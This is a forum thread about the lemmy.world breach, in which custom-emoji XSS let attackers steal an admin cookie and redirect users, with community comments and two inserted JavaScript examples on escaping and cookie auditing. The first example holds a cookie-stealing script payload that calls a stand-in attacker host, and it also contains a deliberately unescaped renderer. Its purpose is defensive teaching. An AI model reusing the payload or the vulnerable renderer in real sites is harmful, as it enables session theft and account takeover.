If you are a lemmy.world user, log out and log back in to clear cookies!

Last night, lemmy.world was compromised via an XSS vulnerability with custom emoji. Using this vulnerability, attackers took control of an admin account. The site redirected to mp4 files when logged in, and porn sites when not logged in. The issue was resolved by lemmy.world admins soon after it started, but the attacker regained control of the compromised admin account around ten minutes after resolution, redirecting users to the same mp4 files and sites. Soon after that, the site became inaccessible. The issue is currently resolved, and the lemmy dev team has been notified of this vulnerability. sh.itjust.works will not be affected, as we do not have any custom emojis. If you own an instance with custom emojis, it is advised to remove these emojis and clear your cookies.

The following is the original post:

PSA: DO NOT ATTEMPT TO ACCESS LEMMY.WORLD, THERE MIGHT BE MALWARE

Lemmy.world member here. I created this account after .world started redirecting me to porn sites and odd mp4 files. We might want to defederate to limit the potential impact. Also, SJW might be affected by the same vulnerabilities as .world, so maybe the admins here should look at that.

Edit: Situation seems to have stabilized. Some site icons aren’t loading, but otherwise everything seems stable. Read Edit2

Edit2: HOLY SHIT IT'S BACK Read Edit3

Edit3: lemmy.world is now down as of 10:56 PM CST (USA) Read Edit4

Edit4: lemmy.world is now up, but serving an error as of 11:03 CST (USA) See a screenshot of this error. I also got logged out, hopefully it doesn’t mean they just wiped the databases lol.

Edit5: Edit4 still applies, but I can now access lemmy.world via Memmy on my phone. Wefwef (Voyager now) does not work, however. Timestamp: 11:34 PM CST (USA)

Edit6: lemmy.world restored. Compromised admin account said something in a weird post. I’m going to bed now, my brain is play-dough rn. Will update you guys tomorrow morning.
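
The mechanism the post describes, as an added example that is not Lemmy's code and not part of the original post: a custom-emoji shortcode renderer that interpolates the emoji's fields into an `<img>` tag without escaping is a stored-XSS sink, because whoever controls an emoji definition gets a script into every page that renders that shortcode, and the body text of posts can be escaped perfectly and it will not help. The field names (`shortcode`, `image_url`, `alt_text`), the emoji table and the attacker payload are constructed for this example; the page does not say which field lemmy.world's bug was in. `auditEmojiTable` is the kind of check an instance owner with custom emojis could run over their own table before deciding whether to remove them.

```javascript
// Added example, not Lemmy's code. Shows how a custom-emoji renderer
// becomes a stored-XSS sink and what the hardened version looks like.
// Field names (shortcode, image_url, alt_text) and all data are constructed.

// Minimal HTML escaping for text and attribute-value contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Constructed emoji table: one benign entry and one whose alt text is a
// payload that closes the attribute and exfiltrates document.cookie.
const EMOJIS = {
  smile: { image_url: 'https://example.invalid/smile.png', alt_text: 'smile' },
  evil: {
    image_url: 'https://example.invalid/x.png',
    alt_text: '"><script>fetch("https://attacker.invalid/?c="+document.cookie)</script>',
  },
};

// VULNERABLE: emoji fields are interpolated into HTML as-is.
function renderEmojiVulnerable(shortcode, table = EMOJIS) {
  const e = table[shortcode];
  if (!e) return `:${shortcode}:`;
  return `<img src="${e.image_url}" alt="${e.alt_text}" title="${e.alt_text}">`;
}

// HARDENED: every interpolated value is escaped and the image URL must be http(s),
// so a javascript: or data: URL in the table cannot become an active src.
function renderEmojiSafe(shortcode, table = EMOJIS) {
  const e = table[shortcode];
  const fallback = escapeHtml(`:${shortcode}:`);
  if (!e) return fallback;
  let url;
  try { url = new URL(e.image_url); } catch { return fallback; }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return fallback;
  const alt = escapeHtml(e.alt_text);
  return `<img src="${escapeHtml(url.href)}" alt="${alt}" title="${alt}">`;
}

// Render a post body: escape the user text, then expand :shortcode: tokens.
// The post text is escaped on both paths; only the emoji renderer differs,
// which is why the bug lives in emoji definitions rather than in post text.
function renderPost(body, renderEmoji = renderEmojiSafe) {
  return escapeHtml(body).replace(/:([a-z0-9_]+):/g, (_m, name) => renderEmoji(name));
}

// Operator check: flag emoji definitions that carry HTML-significant
// characters or non-http(s) image URLs. Returns a list of findings.
function auditEmojiTable(table) {
  const findings = [];
  for (const [shortcode, e] of Object.entries(table)) {
    for (const field of ['image_url', 'alt_text']) {
      if (/[<>"'&]/.test(String(e[field] ?? ''))) {
        findings.push({ shortcode, field, reason: 'html-significant characters' });
      }
    }
    if (!/^https?:\/\//i.test(String(e.image_url ?? ''))) {
      findings.push({ shortcode, field: 'image_url', reason: 'not an http(s) URL' });
    }
  }
  return findings;
}

// Stand-alone demonstration of the three functions on the constructed table.
console.log(renderPost('hello :evil:', renderEmojiVulnerable));
console.log(renderPost('hello :evil:'));
console.log(auditEmojiTable(EMOJIS));
```

The vulnerable path emits a live `<script>` tag for `:evil:` even though the surrounding post text was escaped; the safe path emits the same payload as inert `&lt;script&gt;` text inside the attribute. The audit is deliberately crude (any `<>"'&` in a field, any non-http(s) URL) because on a table that should only hold short names and image links, any hit is worth a human look.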

  • 🍹Early to RISA 🧉@sh.itjust.works · 67 up, 1 down · 1 year ago

    Talk about feeling like the old internet. I was wondering how I would get tricked into seeing something gross by some shock-humor edgelord.

    Time to just grab a pint and wait this out. Lol

  • TheDude@sh.itjust.works (M) · 55 up · 1 year ago

    The vulnerability appeared to be from a custom emoji that they were running. SJW does not use any custom emoji so we should not be affected. In either case lemmy.world has now been restored and is back online. I’ll keep an extra eye on this instance until the patch gets released shortly.

  • BitingChaos@kbin.social · 25 up · 1 year ago

    Well, on the bright side of things, I’m able to find out about my main server going down from the dozens of other active instances.

    • SimplePhysics@sh.itjust.works (OP) · 8 up · 1 year ago

      Damn. SJW and .world share the same lemmy source code. Could what is happening to .world happen to SJW? I’d take a dig into the lemmy code, but my brain is literal mush right now, it's 11:16 PM here.

      • TWeaK@lemm.ee · 9 up · 1 year ago

        Potentially. Apparently it’s spreading through comments, not just the sidebar.

  • Ziggurat@sh.itjust.works · 16 up · 1 year ago

    What’s the impact for other instance users?

    None? lemmy.world was down during the night and is fixed this morning, that’s it?

    Is there a risk that interactions with lemmy.world are leaked, including potential “personal data”?

    Is there a risk that smarter hackers could use the breach to access the DB behind some lemmy instances without anybody noticing it?

    • SimplePhysics@sh.itjust.works (OP) · 4 up · 1 year ago

      Lemmy.world was defaced last night. As far as I know, there is no DB breach. An XSS vulnerability was abused to steal the cookies of an admin account.
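
Why a stolen cookie is a stolen account, as an added check rather than anything from the original post or from Lemmy: script injected through an XSS can read every cookie that is not marked `HttpOnly`, so a session token stored in such a cookie is one `document.cookie` read away from the attacker. The page does not say how lemmy.world's session cookie was configured. The cookie name `jwt`, the list of session cookie names, the 30-day `Max-Age` threshold and the two sample `Set-Cookie` headers are assumptions constructed for this example; `auditSessionCookie` is the kind of check an operator would run against their own instance's responses.

```javascript
// Added example, not Lemmy's code. Parses Set-Cookie headers and flags the
// attributes whose absence turns an XSS into session theft.
// The cookie name 'jwt', the session-name list, the 30-day threshold and the
// sample headers are constructed assumptions for this example.

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute keys are lower-cased; valueless attributes (HttpOnly, Secure) become true.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    value: eq === -1 ? '' : pair.slice(eq + 1),
    attrs: {},
  };
  for (const a of attrs) {
    if (!a) continue;
    const i = a.indexOf('=');
    const key = (i === -1 ? a : a.slice(0, i)).trim().toLowerCase();
    cookie.attrs[key] = i === -1 ? true : a.slice(i + 1).trim();
  }
  return cookie;
}

// Assumption: cookies with these names carry a login session.
const SESSION_COOKIE_NAMES = ['jwt', 'session', 'sessionid'];

// Assumption for this example: a session token older than 30 days is too long-lived.
const MAX_SESSION_AGE_SECONDS = 30 * 24 * 3600;

// Audit a Set-Cookie header. Non-session cookies are reported with session: false
// and no issues; session cookies get one issue per missing hardening attribute.
function auditSessionCookie(header, sessionNames = SESSION_COOKIE_NAMES) {
  const c = parseSetCookie(header);
  const issues = [];
  if (!sessionNames.includes(c.name.toLowerCase())) {
    return { name: c.name, session: false, issues };
  }
  if (c.attrs.httponly !== true) {
    issues.push('missing HttpOnly: injected script can read the token via document.cookie');
  }
  if (c.attrs.secure !== true) {
    issues.push('missing Secure: token can be sent over plain HTTP');
  }
  const sameSite = String(c.attrs.samesite ?? '').toLowerCase();
  if (sameSite !== 'lax' && sameSite !== 'strict') {
    issues.push('SameSite missing or None: cookie is attached to cross-site requests');
  }
  const maxAge = Number(c.attrs['max-age']);
  if (Number.isFinite(maxAge) && maxAge > MAX_SESSION_AGE_SECONDS) {
    issues.push('Max-Age over 30 days: a stolen token stays valid for a long time');
  }
  return { name: c.name, session: true, issues };
}

// Constructed headers: the weak form and a hardened counterpart.
const WEAK_HEADER = 'jwt=example-token; Path=/; Max-Age=31536000';
const HARDENED_HEADER = 'jwt=example-token; Path=/; Max-Age=604800; HttpOnly; Secure; SameSite=Strict';

// Stand-alone demonstration.
console.log(auditSessionCookie(WEAK_HEADER));
console.log(auditSessionCookie(HARDENED_HEADER));
```

One caveat the check cannot express: `HttpOnly` stops the script from reading the token, but while the victim's tab is open the injected script can still make requests that the browser sends with the cookie attached, so it limits what an XSS can do (no offline reuse of the token) without making the XSS harmless. That is why the advice in the post is both to patch the injection and to clear cookies.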

  • ChronicEd@kbin.social · 8 up, 1 down · 1 year ago

    About 10:38 pm CST I had just opened it on my browser and it flashed a “Reddit has taken over this site for copyright infringement”. And the icon at the top was changed for Israel with the words about raping a child on it. Definitely something wonky going on, but I haven’t seen any redirects to anything off site. Definitely not going back from my computer (sounds like the app is safe, but only will check for an update).

    • SimplePhysics@sh.itjust.works (OP) · 5 up, 1 down · 1 year ago

      Yeah, I get that too, minus the Reddit part. However, during the ten minute span where the attack was resolved (then restarted), a mod/admin account reported that it was caused by a compromised admin account, so not Reddit taking over the site via copyright law. They removed the account, but the issue seems to be back now.

      • ChronicEd@kbin.social · 2 up · 1 year ago

        Yeah! Considering being repeatedly attempted (and succeeding)…I’m guessing it may take a little while to deal with.

  • AndreTelevise@kbin.social · 9 up, 3 down · 1 year ago

    And I have nowhere to go but Kbin because Beehaw is unstable and I don’t want to open up a fourth account. Accumulating fediverse accounts should be the last thing you do

  • Sami@lemmy.zip · 4 up · edited · 1 year ago

    I’m not seeing anything different with lemmy.world on my end. Can anyone else confirm what OP is seeing?

    Edit: Reading that it was resolved in another thread.

    Second edit: Nope, not resolved

  • malloc@sh.itjust.works · 4 up · 1 year ago

    Single 🔧 vs Federated ActivityPub instance, who wins

    😂😂

    Side note: glad the lemmy devs and mods were able to figure it out, and all while doing this part time. Great community, y'all. Hope to contribute my time as well.

    • Chozo@kbin.social · 7 up · edited · 1 year ago

      An admin had their account compromised. The other admins have since fixed the account and everything should be operational again.

      EDIT: Well the site’s still down while they clean up the mess that was left behind. But I think the root problem is fixed now. Should be just a matter of time before they flip the switch again.

    • SimplePhysics@sh.itjust.works (OP) · 4 up · 1 year ago

      A .world mod/admin mentioned a compromised admin account. They removed the account, but the issue returned soon after I made the first edit to the post.